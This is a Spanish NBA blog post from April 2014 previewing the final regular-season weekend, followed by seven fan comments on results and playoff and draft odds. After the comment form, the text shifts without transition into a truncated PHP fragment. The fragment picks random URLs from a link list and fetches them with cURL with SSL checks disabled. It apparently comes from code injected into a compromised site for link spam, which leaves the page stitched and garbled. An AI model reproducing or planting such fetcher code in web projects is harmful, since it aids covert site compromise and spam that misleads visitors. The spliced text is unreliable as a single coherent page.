Fin de semana: The Last

11 de April de 2014 por TheDeerHunter

Termina la regular y se acabaron los fines de semana “relax” para nosotros. Muchísimas gracias a todos los que nos habéis facilitado estos respiros. Máxima intensidad en lo que se avecina. La configuración final del cuadro está en el aire y determinados cruces y ventajas de campo pueden determinar quién terminará siendo el campeón.

Empezamos por hoy viernes. A la 1:30AM, marcado en rojo, tenemos el Pacers@Heat que puede resolver nada menos que el liderato del Este y la ventaja campo en el cruce directo. El premio adicional podría ser el enfrentamiento en primera ronda contra Hawks o Knicks. Ambos tienen difíciles desplazamientos, a Brooklyn unos (1:30AM) y a Toronto los otros (1AM) Los Bulls, que siguen peleando la tercera contra los canadienses se miden a Detroit (2AM) Y la batalla por la 6ª plaza se dirimirá en el Wizards@Magic (1AM) y en el Bobcats@Celtics (1:30AM)
En el Oeste hoy no hay tanto lío, aunque se disputa un gran Suns@Spurs (2:30AM) del que estarán muy pendientes los Grizzlies, presuponiendo su victoria ante Sixers (2AM) Thunder, Blazers y Warriors tienen compromisos sencillos a priori (Pelicans, sin Davis, Jazz y Lakers respectivamente) y los Rockets visitan Minneapolis (2AM)

Mañana más apagado todo, aunque tendremos un duelo directo importantísimo en el Suns@Mavericks (2:30AM) y los Heat visitan Atlanta en lo que podría ser un aperitivo de primera ronda (1:30AM) Otros implicados en postemporada en acción serán los Clippers recibiendo a Kings, los Wizards a Bucks y los Rockets a Pelicans.

Por último, el domingo 7 encuentros pero notablemente intensos. A las 7PM el Thunder@Pacers y a las 9:30PM el Raptors@Pistons. Además un fantástico Warriors@Blazers, eso sí en horario prohibitivo (3:30AM) así como un Bulls@Knick (1:30AM) que podría suponer el finiquito de los de la Gran Manzana. Finalmente los Nets reciben a los Magic y los Grizzlies visitan los Lakers.

A disfrutar lo que nos queda.

Comenta

7 comentarios a esta entrada

  1. Denise dice:
    #1

    Los Wolves sin Pekovic, Love y Martin se zumban a los Rockets (sin Howard) con 51 puntos de Brewer y un 12-20 de Dieng con canasta ganadora. Lo de Brewer tremendo, canstas de todos los colores, bombitas, penetraciones, al contraataque, tiros de media distancia y hasta triple desde el medio campo. Y la canasta ganadora de Dieng me parecen unos pasos de escandalos, pero bueno, todo sea por el show..

    Los Knicks ganaron en Canadá, con un buen Melo y un excepcional Amare recordando viejos tiempos, pero no sirvió para mucho, ya que en Brooklyn, los Hawks con Millsap y Teague pletóricos, se cepillaban a unos Nets con bastants bajas. Si al principio de temporada me dicen que un base mexicano desconocido jugaría de titular en el superproyecto de Prokhorov, me parto de risa.

    En el partidazo entre Miami e Indiana, Lebron demostró una vez más porque es The Choosen, y le despachó 36 puntos a los Pacers. El partido fue un mero trámite para los de Florida y ya a mediados del tercer cuarto, no hubo historia, alcanzando Miami rentas de más de 20 puntos. Indiana maquilló al final..

    En la lucha por los Playoffs del Oeste, GSW se asegura el pase a la post-temporada tras vencer a “estos Lakers”, Memphis ganó facil a Philly, y Phoenix sin Dragic no pudo doblegar a unos Spurs sin Duncan, Ginobili, Mills ó Diaw. Me da que este tropiezo les va a costar su presencia en PO.

      Citar

  2. Denise dice:
    #2

    Pues el 8º clasificado para PO en el Este será Atlanta, tras una importantisima trabajada victoria ante Miami, dandoles de paso un aviso por si se cruzan en primera ronda. Gran temporada la de los halcones que han sabido sobrevivir sin el halcón jefe Horford.
    Por los Knicks, otro año de fracaso, fiasco, debacle, verguenza y todos los calificativos negativos que le puedas poner a esta franquicia podrida de billetes pero que luego en pista siempre hace el ridículo. Con lo facil que debía haber sido para una franquicia tan poderosa como ellos, meterse en Playoffs en una conferencia con tan bajo nivel, pues nada, otro año para reflexionar y para aprender de los tantos errores que llevan cometidos en los últimos 15 años.
    De paso, gran noticia para los Magic, ya que la eliminación de NY, les asegura un Top 14 del próximo Draft, que casi con toda seguridad (93’5% de probabilidad) será un pick 12 (de Denver)

    Por la última posición de PO del oeste, los Mavs vencieron a Phoenix, en un partido que los Suns tenían controlado con rentas de más de 10 puntos en el tercer cuarto, pero a mediados de este periodo, 5 triples consecutivos para los texanos anotados entre Ellis y Nowitzki, pusieron el partido apretado, y en ese contexto de partido igualado, pocos se mueven mejor que Monta Ellis en los minutos en los que la bola quema, y el ex de los Bucks acabó ajusticiando a los de Arizona anotando 7 de los últimos 12 puntos de su equipo para llevarlos a la victoria.
    Por tanto, la última plaza se la jugarán los Suns contra los Grizzlies en el partido que les enfrentará el lunes en la cancha de Phoenix a las 03:00 hora española.

      Citar

  3. Nacho dice:
    #3

    Denise:

    Por tanto, la última plaza se la jugarán los Suns contra los Grizzlies en el partido que les enfrentará el lunes en la cancha de Phoenix a las 03:00 hora española.

    Desgraciadamente para los Suns y los que hemos creído en el cuento, los Grizzlies deberían perder otro partido además del que les enfrenta para lograrlo

      Citar

  4. Vader dice:
    #4

    Ojala Phoneix tenga mucha suerte y se lleve un top-3 del draft, se lo merecen!!!

      Citar

  5. rumbero dice:
    #5

    Lo tiene difícil Phoenix. Tienen que ganar a Memphis y esperar que estos pierdan contra unos Mavs que, en ese caso, ya tendrían el séptimo puesto asegurado. Pena por los Suns pero por otro lado nos hemos asegurado ver a Dirk en PO

    Y luego está el cachondeo del liderato en el este. Muchos palos a los Pacers pero telita también como está acabando Miami que se puede quedar sin él por palmar contra los Hawks. Con la victoria de Pacers ante los Thunder (pese al partido de Hibbert y gracias a que Oklahoma tampoco se jugaba nada) si ganan a Orlando aseguran la primera plaza.

      Citar

  6. Denise dice:
    #6

    Vader:
    Ojala Phoneix tenga mucha suerte y se lleve un top-3 del draft, se lo merecen!!!

    Eso no sería suerte, sería algo más que un milagro. El mejor de los que se quedan fuera de PO, tiene en la lotería el 1,8% de probabilidades de pillar un top 3, en cambio tiene el 98,2% de llevarse el pick 14.

      Citar

  7. Esteban dice:
    #7

    los Pacers pierden con todos pero le ganan al Thunder, quien los entiende

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>